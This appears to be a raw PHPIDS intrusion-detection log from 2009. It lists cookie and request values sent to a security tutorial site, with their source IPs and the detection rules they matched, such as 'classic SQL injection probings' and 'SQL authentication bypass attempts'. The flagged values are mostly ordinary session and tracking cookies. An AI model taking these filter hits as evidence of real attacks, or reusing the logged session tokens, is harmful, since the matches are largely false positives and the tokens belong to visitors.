Page:/i.php?page=videos%2Fndiff-nmap-5
IP:78.46.48.165
Impact:172
Created:2009-11-07 17:37:44
Details:
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:59390
Name:COOKIE.CommunityServer-UserCookie1001
Value:mra=11/7/2009 6:12:14 AM
Page:/i.php?page=videos%2Fndiff-nmap-5
IP:78.46.48.165
Impact:172
Created:2009-11-07 17:37:44
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:59391
Name:COOKIE.CFGLOBALS
Value:urltoken=CFID#=1647409&CFTOKEN#=43458014&jsessionid#=3030dd227a70b528e33234624e2256436e7f#lastvisit={ts '2009-11-07 15:45:40'}#timecreated={ts '2009-11-07 07:03:18'}#hitcount=9#cftoken=43458014#cfid=1647409#
Page:/i.php?page=videos%2Fndiff-nmap-5
IP:78.46.48.165
Impact:172
Created:2009-11-07 17:37:44
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.1923076923077
Converted: ((((+::

ID:59392
Name:COOKIE.DB
Value:msRandX=93&ItemDetailsBeta=Y&msProduct=1782427&Surveyflag=1&msImageID=/microsoft/MSelasticity-bnr_430x150C.jpg&msImageSC=/microsoft/MSelasticity-bnr_620x150C.jpg
Page:/i.php?page=videos%2Fndiff-nmap-5
IP:78.46.48.165
Impact:172
Created:2009-11-07 17:37:44
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 1/2 | Tags: xss, csrf, id, rfe | ID: 30
Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:59393
Name:COOKIE.Cart
Value:PHRoutine=10&Referer=&Landing=http://www.tigerdirect.com/applications/searchtools/item-details.asp?EdpNo=5279858&SRCCODE=WEBRSS013&cm_mmc=RSS-_-TigerDirect-_-Category-_-TopSellers
Page:/i.php?page=videos%2Fndiff-nmap-5
IP:78.46.48.165
Impact:172
Created:2009-11-07 17:37:44
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:59394
Name:COOKIE.RubricSession
Value:U2FsdGVkX18iVFgMfh2HBpP0qjQM8QZMZmI6QA407kc=
Page:/i.php?page=videos%2Fndiff-nmap-5
IP:78.46.48.165
Impact:172
Created:2009-11-07 17:37:44
Details:
Impact: 7 | Tags: xss, csrf, id, rfe, lfi
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 2.7058823529412

ID:59395
Name:REQUEST.PREF
Value:ID=20fd167e89c67864:TM=1257636027:LM=1257636027:S=W1-vw36YKGCtb4md
Page:/i.php?page=security%2Fchangemac
IP:78.46.34.48
Impact:210
Created:2009-11-07 17:37:44
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects data: URL injections and common URI schemes | Tags: xss, rfe | ID: 27

ID:59396
Name:REQUEST.language
Value:--
Page:/i.php?page=security%2Fchangemac
IP:78.46.34.48
Impact:210
Created:2009-11-07 17:37:44
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:59397
Name:REQUEST.IW
Value:SendToAFriend=http://www.industryweek.com/readarticle.aspx?ArticleID=20354
Page:/i.php?page=security%2Fchangemac
IP:78.46.34.48
Impact:210
Created:2009-11-07 17:37:44
Details:
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:59398
Name:REQUEST.Cart
Value:PHRoutine=10&Referer=&Landing=http://www.tigerdirect.com/applications/searchtools/item-Details.asp?EdpNo=4938551&sku=H94-2502&SRCCODE=WEBRSS002&cm_mmc=RSS-_-TigerDirect-_-Carls-_-RSS
Page:/i.php?page=security%2Fchangemac
IP:78.46.34.48
Impact:210
Created:2009-11-07 17:37:44
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:59399
Name:REQUEST.DB
Value:msRandX=14&ItemDetailsBeta=Y&msProduct=335878&Surveyflag=1&msImageID=/microsoft/MSelasticity-bnr_430x150A.jpg&msImageSC=/microsoft/MSelasticity-bnr_620x150A.jpg
Page:/i.php?page=security%2Fchangemac
IP:78.46.34.48
Impact:210
Created:2009-11-07 17:37:44
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 1/2 | Tags: xss, csrf, id, rfe | ID: 30

ID:59400
Name:REQUEST.CommunityServer-UserCookie1001
Value:lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=11/7/2009 8:48:57 AM
Page:/i.php?page=security%2Fchangemac
IP:78.46.34.48
Impact:210
Created:2009-11-07 17:37:44
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:59401
Name:REQUEST.CFGLOBALS
Value:urltoken=CFID#=2643168&CFTOKEN#=abc9fcff707241ea-CEE85DF8-DD81-42FD-FA80CA5635295B63&jsessionid#=30309a9ac39d048b184830114813426bda49#lastvisit={ts '2009-11-07 15:45:29'}#timecreated={ts '2009-11-07 15:45:27'}#hitcount=4#cftoken=abc9fcff707241ea-CEE85DF8-DD81-42FD-FA80CA5635295B63#cfid=2643168#
Page:/i.php?page=security%2Fchangemac
IP:78.46.34.48
Impact:210
Created:2009-11-07 17:37:44
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.1923076923077
Converted: ((((+::

ID:59402
Name:REQUEST.exp_tracker
Value:a:4:{i:0;s:55:"/workshops/How-to-prepare-for-FTA-negotiations-Part-II/";i:1;s:55:"/site/article/century-trends-in-victorian-temperatures/";i:2;s:56:"/blog/recession-special-5-great-sites-to-save-you-money/";i:3;s:54:"/apple/comment/sims-3-world-adventures-expansion-pack/";}
Page:/i.php?page=security%2Fchangemac
IP:78.46.34.48
Impact:210
Created:2009-11-07 17:37:44
Details:
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:59403
Name:REQUEST.OAGEO
Value:US||||||||||
Page:/i.php?page=security%2Fchangemac
IP:78.46.34.48
Impact:210
Created:2009-11-07 17:37:44
Details:
Description: Detects obfuscated JavaScript script injections | Tags: xss, csrf | ID: 25

ID:59404
Name:REQUEST.ci_session
Value:a:4:{s:10:"session_id";s:32:"d4e45039be7ab5084d08928b6426a40e";s:10:"ip_address";s:11:"78.46.34.48";s:10:"user_agent";s:50:"Mozilla/5.0 (compatible; proximic; +http://www.pro";s:13:"last_activity";s:10:"1257671884";}2363a05e223f03e91d692312f294a5ce
Page:/i.php?page=security%2Fchangemac
IP:78.46.34.48
Impact:210
Created:2009-11-07 17:37:44
Details:
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: ---
Ratio: ---
Converted: (((++:

ID:59405
Name:COOKIE.PREF
Value:ID=20fd167e89c67864:TM=1257636027:LM=1257636027:S=W1-vw36YKGCtb4md
Page:/i.php?page=security%2Fchangemac
IP:78.46.34.48
Impact:210
Created:2009-11-07 17:37:44
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects data: URL injections and common URI schemes | Tags: xss, rfe | ID: 27

ID:59406
Name:COOKIE.language
Value:--
Page:/i.php?page=security%2Fchangemac
IP:78.46.34.48
Impact:210
Created:2009-11-07 17:37:44
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:59407
Name:COOKIE.IW
Value:SendToAFriend=http://www.industryweek.com/readarticle.aspx?ArticleID=20354
Page:/i.php?page=security%2Fchangemac
IP:78.46.34.48
Impact:210
Created:2009-11-07 17:37:44
Details:
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:59408
Name:COOKIE.Cart
Value:PHRoutine=10&Referer=&Landing=http://www.tigerdirect.com/applications/searchtools/item-Details.asp?EdpNo=4938551&sku=H94-2502&SRCCODE=WEBRSS002&cm_mmc=RSS-_-TigerDirect-_-Carls-_-RSS
Page:/i.php?page=security%2Fchangemac
IP:78.46.34.48
Impact:210
Created:2009-11-07 17:37:44
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:59409
Name:COOKIE.DB
Value:msRandX=14&ItemDetailsBeta=Y&msProduct=335878&Surveyflag=1&msImageID=/microsoft/MSelasticity-bnr_430x150A.jpg&msImageSC=/microsoft/MSelasticity-bnr_620x150A.jpg
Page:/i.php?page=security%2Fchangemac
IP:78.46.34.48
Impact:210
Created:2009-11-07 17:37:44
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 1/2 | Tags: xss, csrf, id, rfe | ID: 30

ID:59410
Name:COOKIE.CommunityServer-UserCookie1001
Value:lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=11/7/2009 8:48:57 AM
Page:/i.php?page=security%2Fchangemac
IP:78.46.34.48
Impact:210
Created:2009-11-07 17:37:44
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:59411
Name:COOKIE.CFGLOBALS
Value:urltoken=CFID#=2643168&CFTOKEN#=abc9fcff707241ea-CEE85DF8-DD81-42FD-FA80CA5635295B63&jsessionid#=30309a9ac39d048b184830114813426bda49#lastvisit={ts '2009-11-07 15:45:29'}#timecreated={ts '2009-11-07 15:45:27'}#hitcount=4#cftoken=abc9fcff707241ea-CEE85DF8-DD81-42FD-FA80CA5635295B63#cfid=2643168#
Page:/i.php?page=security%2Fchangemac
IP:78.46.34.48
Impact:210
Created:2009-11-07 17:37:44
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.1923076923077
Converted: ((((+::

ID:59412
Name:COOKIE.exp_tracker
Value:a:4:{i:0;s:55:"/workshops/How-to-prepare-for-FTA-negotiations-Part-II/";i:1;s:55:"/site/article/century-trends-in-victorian-temperatures/";i:2;s:56:"/blog/recession-special-5-great-sites-to-save-you-money/";i:3;s:54:"/apple/comment/sims-3-world-adventures-expansion-pack/";}
Page:/i.php?page=security%2Fchangemac
IP:78.46.34.48
Impact:210
Created:2009-11-07 17:37:44
Details:
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:59413
Name:COOKIE.OAGEO
Value:US||||||||||
Page:/i.php?page=security%2Fchangemac
IP:78.46.34.48
Impact:210
Created:2009-11-07 17:37:44
Details:
Description: Detects obfuscated JavaScript script injections | Tags: xss, csrf | ID: 25

ID:59414
Name:COOKIE.ci_session
Value:a:4:{s:10:"session_id";s:32:"d4e45039be7ab5084d08928b6426a40e";s:10:"ip_address";s:11:"78.46.34.48";s:10:"user_agent";s:50:"Mozilla/5.0 (compatible; proximic; +http://www.pro";s:13:"last_activity";s:10:"1257671884";}2363a05e223f03e91d692312f294a5ce
Page:/i.php?page=security%2Fchangemac
IP:78.46.34.48
Impact:210
Created:2009-11-07 17:37:44
Details:
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: ---
Ratio: ---
Converted: (((++:

ID:59415
Name:REQUEST.language
Value:--
Page:/i.php?page=security%2Fkon-boot-from-usb
IP:213.239.213.230
Impact:208
Created:2009-11-07 17:37:44
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:59416
Name:REQUEST.DB
Value:msRandX=47&ItemDetailsBeta=Y&msProduct=1782290&Surveyflag=1&msImageID=/microsoft/MSelasticity-bnr_430x150B.jpg&msImageSC=/microsoft/MSelasticity-bnr_620x150B.jpg
Page:/i.php?page=security%2Fkon-boot-from-usb
IP:213.239.213.230
Impact:208
Created:2009-11-07 17:37:44
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 1/2 | Tags: xss, csrf, id, rfe | ID: 30
Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:59417
Name:REQUEST.Cart
Value:PHRoutine=10&Referer=&Landing=http://www.tigerdirect.com/applications/searchtools/item-details.asp?EdpNo=3283217&SRCCODE=WEBRSS013&cm_mmc=RSS-_-TigerDirect-_-Category-_-TopSellers
Page:/i.php?page=security%2Fkon-boot-from-usb
IP:213.239.213.230
Impact:208
Created:2009-11-07 17:37:44
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:59418
Name:REQUEST.cm__tracker
Value:a:2:{i:0;s:36:"/gallery/entry/2910/venture-visuals/";i:1;s:36:"/gallery/entry/2903/finders-keepers/";}
Page:/i.php?page=security%2Fkon-boot-from-usb
IP:213.239.213.230
Impact:208
Created:2009-11-07 17:37:44
Details:
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:59419
Name:REQUEST.IW
Value:SendToAFriend=http://www.industryweek.com/readarticle.aspx?ArticleID=20134
Page:/i.php?page=security%2Fkon-boot-from-usb
IP:213.239.213.230
Impact:208
Created:2009-11-07 17:37:44
Details:
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:59420
Name:REQUEST.exp_tracker
Value:a:4:{i:0;s:53:"/weblog/artikel/Wordpress-mit-Readernaut-verheiraten/";i:1;s:55:"/events/detail/childrens-book-sale-september-12th-13th/";i:2;s:18:"/events/detail/p3/";i:3;s:43:"/don-irvine-blog/the-real-bias-is-moderate/";}
Page:/i.php?page=security%2Fkon-boot-from-usb
IP:213.239.213.230
Impact:208
Created:2009-11-07 17:37:44
Details:
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:59421
Name:REQUEST.ecm
Value:user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=instoresnow.walmart.com&SiteLanguage=1033
Page:/i.php?page=security%2Fkon-boot-from-usb
IP:213.239.213.230
Impact:208
Created:2009-11-07 17:37:44
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 1/2 | Tags: xss, csrf, id, rfe | ID: 30

ID:59422
Name:REQUEST.CommunityServer-UserCookie1001
Value:lv=1/1/1999 12:00:00 AM&mra=Sat, 07 Nov 2009 18:18:46 GMT
Page:/i.php?page=security%2Fkon-boot-from-usb
IP:213.239.213.230
Impact:208
Created:2009-11-07 17:37:44
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:59423
Name:REQUEST.CFGLOBALS
Value:urltoken=CFID#=2033299&CFTOKEN#=14336522&jsessionid#=30304d576e822d946f6006e40437b6110e4f#lastvisit={ts '2009-11-07 19:50:17'}#timecreated={ts '2009-11-07 11:47:25'}#hitcount=16#cftoken=58611329#cfid=1658835#
Page:/i.php?page=security%2Fkon-boot-from-usb
IP:213.239.213.230
Impact:208
Created:2009-11-07 17:37:44
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.2307692307692
Converted: ((((+::

ID:59424
Name:COOKIE.language
Value:--
Page:/i.php?page=security%2Fkon-boot-from-usb
IP:213.239.213.230
Impact:208
Created:2009-11-07 17:37:44
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:59425
Name:COOKIE.DB
Value:msRandX=47&ItemDetailsBeta=Y&msProduct=1782290&Surveyflag=1&msImageID=/microsoft/MSelasticity-bnr_430x150B.jpg&msImageSC=/microsoft/MSelasticity-bnr_620x150B.jpg
Page:/i.php?page=security%2Fkon-boot-from-usb
IP:213.239.213.230
Impact:208
Created:2009-11-07 17:37:44
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 1/2 | Tags: xss, csrf, id, rfe | ID: 30
Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:59426
Name:COOKIE.Cart
Value:PHRoutine=10&Referer=&Landing=http://www.tigerdirect.com/applications/searchtools/item-details.asp?EdpNo=3283217&SRCCODE=WEBRSS013&cm_mmc=RSS-_-TigerDirect-_-Category-_-TopSellers
Page:/i.php?page=security%2Fkon-boot-from-usb
IP:213.239.213.230
Impact:208
Created:2009-11-07 17:37:44
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:59427
Name:COOKIE.cm__tracker
Value:a:2:{i:0;s:36:"/gallery/entry/2910/venture-visuals/";i:1;s:36:"/gallery/entry/2903/finders-keepers/";}
Page:/i.php?page=security%2Fkon-boot-from-usb
IP:213.239.213.230
Impact:208
Created:2009-11-07 17:37:44
Details:
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:59428
Name:COOKIE.IW
Value:SendToAFriend=http://www.industryweek.com/readarticle.aspx?ArticleID=20134
Page:/i.php?page=security%2Fkon-boot-from-usb
IP:213.239.213.230
Impact:208
Created:2009-11-07 17:37:44
Details:
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:59429
Name:COOKIE.exp_tracker
Value:a:4:{i:0;s:53:"/weblog/artikel/Wordpress-mit-Readernaut-verheiraten/";i:1;s:55:"/events/detail/childrens-book-sale-september-12th-13th/";i:2;s:18:"/events/detail/p3/";i:3;s:43:"/don-irvine-blog/the-real-bias-is-moderate/";}
Page:/i.php?page=security%2Fkon-boot-from-usb
IP:213.239.213.230
Impact:208
Created:2009-11-07 17:37:44
Details:
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:59430
Name:COOKIE.ecm
Value:user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=instoresnow.walmart.com&SiteLanguage=1033
Page:/i.php?page=security%2Fkon-boot-from-usb
IP:213.239.213.230
Impact:208
Created:2009-11-07 17:37:44
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 1/2 | Tags: xss, csrf, id, rfe | ID: 30

ID:59431
Name:COOKIE.CommunityServer-UserCookie1001
Value:lv=1/1/1999 12:00:00 AM&mra=Sat, 07 Nov 2009 18:18:46 GMT
Page:/i.php?page=security%2Fkon-boot-from-usb
IP:213.239.213.230
Impact:208
Created:2009-11-07 17:37:44
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:59432
Name:COOKIE.CFGLOBALS
Value:urltoken=CFID#=2033299&CFTOKEN#=14336522&jsessionid#=30304d576e822d946f6006e40437b6110e4f#lastvisit={ts '2009-11-07 19:50:17'}#timecreated={ts '2009-11-07 11:47:25'}#hitcount=16#cftoken=58611329#cfid=1658835#
Page:/i.php?page=security%2Fkon-boot-from-usb
IP:213.239.213.230
Impact:208
Created:2009-11-07 17:37:44
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.2307692307692
Converted: ((((+::

ID:59283
Name:REQUEST.DB
Value:msRandX=66&ItemDetailsBeta=Y&msProduct=1782290&Surveyflag=1&msImageID=/microsoft/MSelasticity-bnr_430x150B.jpg&msImageSC=/microsoft/MSelasticity-bnr_620x150B.jpg
Page:/i.php?page=videos%2Fnmap-from-source
IP:78.46.34.47
Impact:158
Created:2009-11-07 17:37:43
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 1/2 | Tags: xss, csrf, id, rfe | ID: 30
Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:59284
Name:REQUEST.language
Value:--
Page:/i.php?page=videos%2Fpn12%2Fbruce-potter-three-cool-security-technologies-youve-never-heard-of
IP:87.118.122.162
Impact:220
Created:2009-11-07 17:37:43
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:59285
Name:REQUEST.cm__tracker
Value:a:1:{i:0;s:54:"/blog/post/2933/a-new-look-for-system-emails-and-more/";}
Page:/i.php?page=videos%2Fpn12%2Fbruce-potter-three-cool-security-technologies-youve-never-heard-of
IP:87.118.122.162
Impact:220
Created:2009-11-07 17:37:43
Details:
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:59286
Name:REQUEST.exp_tracker
Value:a:4:{i:0;s:67:"/weblog/artikel/Welche-Werkzeuge-verwendet-ihr-zur-Web-Entwicklung/";i:1;s:18:"/events/detail/p1/";i:2;s:62:"/article/419-cbs-call-redstone-light-at-the-end-of-the-tunnel/";i:3;s:54:"/article/419-inside-word-in-defense-of-ads-in-twitter/";}
Page:/i.php?page=videos%2Fpn12%2Fbruce-potter-three-cool-security-technologies-youve-never-heard-of
IP:87.118.122.162
Impact:220
Created:2009-11-07 17:37:43
Details:
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:59287
Name:REQUEST.CFGLOBALS
Value:urltoken=CFID#=1654852&CFTOKEN#=87450961&jsessionid#=3030f94bb9262e539f40916a2e4f2c286c71#lastvisit={ts '2009-11-07 15:45:29'}#timecreated={ts '2009-11-07 10:17:11'}#hitcount=16#cftoken=87450961#cfid=1654852#
Page:/i.php?page=videos%2Fpn12%2Fbruce-potter-three-cool-security-technologies-youve-never-heard-of
IP:87.118.122.162
Impact:220
Created:2009-11-07 17:37:43
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.2307692307692
Converted: ((((+::

ID:59288
Name:REQUEST.CommunityServer-UserCookie1001
Value:lv=1/1/1999 12:00:00 AM&mra=11/7/2009 2:37:24 PM
Page:/i.php?page=videos%2Fpn12%2Fbruce-potter-three-cool-security-technologies-youve-never-heard-of
IP:87.118.122.162
Impact:220
Created:2009-11-07 17:37:43
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:59289
Name:REQUEST.DB
Value:msRandX=61&ItemDetailsBeta=Y&msProduct=1782290&Surveyflag=1&msImageID=/microsoft/MSelasticity-bnr_430x150B.jpg&msImageSC=/microsoft/MSelasticity-bnr_620x150B.jpg
Page:/i.php?page=videos%2Fpn12%2Fbruce-potter-three-cool-security-technologies-youve-never-heard-of
IP:87.118.122.162
Impact:220
Created:2009-11-07 17:37:43
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 1/2 | Tags: xss, csrf, id, rfe | ID: 30
Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:59290
Name:REQUEST.Cart
Value:PHRoutine=10&Referer=&Landing=http://www.tigerdirect.com/applications/searchtools/item-details.asp?EdpNo=4829307&SRCCODE=WEBRSS013&cm_mmc=RSS-_-TigerDirect-_-Category-_-TopSellers
Page:/i.php?page=videos%2Fnmap-from-source
IP:78.46.34.47
Impact:158
Created:2009-11-07 17:37:43
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:59291
Name:REQUEST.Cart
Value:PHRoutine=10&Referer=&Landing=http://www.tigerdirect.com/applications/searchtools/item-details.asp?EdpNo=5344797&SRCCODE=WEBRSS013&cm_mmc=RSS-_-TigerDirect-_-Category-_-TopSellers
Page:/i.php?page=videos%2Fpn12%2Fbruce-potter-three-cool-security-technologies-youve-never-heard-of
IP:87.118.122.162
Impact:220
Created:2009-11-07 17:37:43
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:59292
Name:REQUEST.IW
Value:SendToAFriend=http://www.industryweek.com/readarticle.aspx?ArticleID=20095
Page:/i.php?page=videos%2Fnmap-from-source
IP:78.46.34.47
Impact:158
Created:2009-11-07 17:37:43
Details:
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:59293
Name:REQUEST.Apache
Value:"A~23b8ca97e0c9e5cf95e5b207ac990469"
Page:/i.php?page=videos%2Fpn12%2Fbruce-potter-three-cool-security-technologies-youve-never-heard-of
IP:87.118.122.162
Impact:220
Created:2009-11-07 17:37:43
Details:
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 2.3333333333333

ID:59294
Name:REQUEST.exp_tracker
Value:a:4:{i:0;s:37:"/apple/comment/27-inch-imac-troubles/";i:1;s:72:"/apple/comment/macintosh-iphone-software-update-roundup-november-6-2009/";i:2;s:39:"/events/detail/fall-preview-upper-east/";i:3;s:18:"/events/detail/p4/";}
Page:/i.php?page=videos%2Fnmap-from-source
IP:78.46.34.47
Impact:158
Created:2009-11-07 17:37:43
Details:
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:59295
